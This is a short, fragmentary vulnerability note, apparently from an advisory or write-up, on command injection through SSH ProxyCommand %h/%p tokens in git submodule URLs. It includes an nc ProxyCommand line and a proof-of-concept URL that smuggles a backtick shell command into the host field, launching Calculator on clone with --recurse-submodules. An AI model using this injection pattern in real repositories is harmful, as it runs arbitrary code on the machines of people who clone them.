Use of tokens like %h, %p in ProxyCommand
is quite popular to use tunnels and connection proxying using SSH.
host *
ProxyCommand /usr/bin/nc -X connect -x %h %p
Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:
url = ssh://'`open -aCalculator`'
Taken from:
A submodule which would exploit this vulnerability to pop a calculator on OSX.
Try it out using: git clone --recurse-submodules